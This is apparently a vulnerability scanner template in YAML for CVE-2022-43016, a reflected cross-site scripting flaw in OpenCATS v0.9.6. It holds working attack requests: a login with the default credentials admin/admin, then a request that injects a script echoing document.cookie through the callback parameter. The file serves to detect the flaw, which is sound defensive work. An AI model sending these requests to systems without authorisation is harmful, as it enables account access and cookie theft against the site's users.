38 lines
960 B
YAML
38 lines
960 B
YAML
|
id: CVE-2022-43016
|
||
|
|
||
|
info:
|
||
|
name: OpenCATS - Cross Site Scripting
|
||
|
author: arafatansari
|
||
|
severity: medium
|
||
|
description: |
|
||
|
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback component.
|
||
|
reference:
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43016
|
||
|
tags: xss,cve,2022
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /index.php?m=login&a=attemptLogin HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
username=admin&password=admin
|
||
|
|
||
|
- |
|
||
|
GET /index.php?m=toolbar&callback=<script>alert(document.cookie)</script>&a=authenticate HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
host-redirects: true
|
||
|
max-redirects: 2
|
||
|
cookie-reuse: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- '<script>alert(document.cookie)</script>'
|